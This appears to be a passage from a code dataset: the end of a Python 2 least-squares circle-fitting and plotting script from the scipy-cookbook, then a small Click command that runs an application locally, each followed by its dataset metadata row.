Ri_4 = calc_R([xc_4, yc_4])
residu_4 = sum((Ri_4 - R_4)**2)
residu2_4 = sum((Ri_4**2-R_4**2)**2)
ncalls_4 = f_4.ncalls
print "Method 4 :"
print "Functions calls : f_4=%d jacb=%d jacd=%d" % (f_4.ncalls, jacb.ncalls, jacd.ncalls)
# Summary
fmt = '%-18s %10.5f %10.5f %10.5f %10d %10.6f %10.6f %10.2f'
print ('\n%-18s' +' %10s'*7) % tuple('METHOD Xc Yc Rc nb_calls std(Ri) residu residu2'.split())
print '-'*(18 +7*(10+1))
print fmt % (method_1, xc_1, yc_1, R_1, 1, Ri_1.std(), residu_1, residu2_1)
print fmt % (method_2, xc_2, yc_2, R_2, ncalls_2, Ri_2.std(), residu_2, residu2_2)
print fmt % (method_3, xc_3, yc_3, R_3, ncalls_3, Ri_3.std(), residu_3, residu2_3)
print fmt % (method_4, xc_4, yc_4, R_4, ncalls_4, Ri_4.std(), residu_4, residu2_4)
# plotting functions
from matplotlib import pyplot as p, cm
def plot_all(residu2=False, basename='circle'):
""" Draw data points, best fit circles and center for the three methods,
and adds the iso contours corresponding to the fiel residu or residu2
"""
f = p.figure(figsize=(6.5, 4.5), dpi=90, facecolor='white')
p.axis('equal')
p.plot(x, y, 'ro', label='data', ms=9, mec='b', mew=1)
theta_fit = linspace(-pi, pi, 180)
x_fit1 = xc_1 + R_1*cos(theta_fit)
y_fit1 = yc_1 + R_1*sin(theta_fit)
p.plot(x_fit1, y_fit1, 'b-' , label=method_1, lw=2)
x_fit2 = xc_2 + R_2*cos(theta_fit)
y_fit2 = yc_2 + R_2*sin(theta_fit)
p.plot(x_fit2, y_fit2, 'k--', label=method_2, lw=2)
x_fit3 = xc_3 + R_3*cos(theta_fit)
y_fit3 = yc_3 + R_3*sin(theta_fit)
p.plot(x_fit3, y_fit3, 'r-.', label=method_3, lw=2)
p.plot([xc_1], [yc_1], 'bD', mec='y', mew=1)
p.plot([xc_2], [yc_2], 'gD', mec='r', mew=1)
p.plot([xc_3], [yc_3], 'kD', mec='w', mew=1)
# draw
p.xlabel('x')
p.ylabel('y')
p.legend(loc='best',labelspacing=0.1)
# plot the residu fields
nb_pts = 100
p.draw()
xmin, xmax = p.xlim()
ymin, ymax = p.ylim()
vmin = min(xmin, ymin)
vmax = max(xmax, ymax)
xg, yg = ogrid[vmin:vmax:nb_pts*1j, vmin:vmax:nb_pts*1j]
xg = xg[..., newaxis]
yg = yg[..., newaxis]
Rig = sqrt( (xg - x)**2 + (yg - y)**2 )
Rig_m = Rig.mean(axis=2)[..., newaxis]
if residu2 : residu = sum( (Rig**2 - Rig_m**2)**2 ,axis=2)
else : residu = sum( (Rig-Rig_m)**2 ,axis=2)
lvl = exp(linspace(log(residu.min()), log(residu.max()), 15))
p.contourf(xg.flat, yg.flat, residu.T, lvl, alpha=0.75, cmap=cm.Purples_r)
cbar = p.colorbar(format='%.f')
if residu2 : cbar.set_label('Residu_2')
else : cbar.set_label('Residu')
p.xlim(xmin=vmin, xmax=vmax)
p.ylim(ymin=vmin, ymax=vmax)
p.grid()
p.title('Leasts Squares Circle')
p.savefig('%s_residu%d.png' % (basename, 2 if residu2 else 1))
plot_all(residu2=False, basename='circle')
plot_all(residu2=True , basename='circle')
p.show()
# vim: set et sts=4 sw=4:
| 26.829268 | 109 | 0.598961 | [
"BSD-3-Clause"
] | AlexEMG/scipy-cookbook | ipython/attachments/Least_Squares_Circle/least_squares_circle_v3.py | 7,700 | Python |
import click
from config.settings import app
@click.group()
def cli():
"""
Serves the application for testing locally. If you want to test it
in a production like environment, please deploy with Docker.\n
:return: Application instance
"""
click.echo('\033[95mINFO: Starting the app..\033[0m')
app.run()
| 19.764706 | 70 | 0.678571 | [
"MIT"
] | laith43d/JUJU-User-Example | cli/commands/cmd_serve.py | 336 | Python |
Subsets and Splits
No saved queries yet
Save your SQL queries to embed, download, and access them later. Queries will appear here once saved.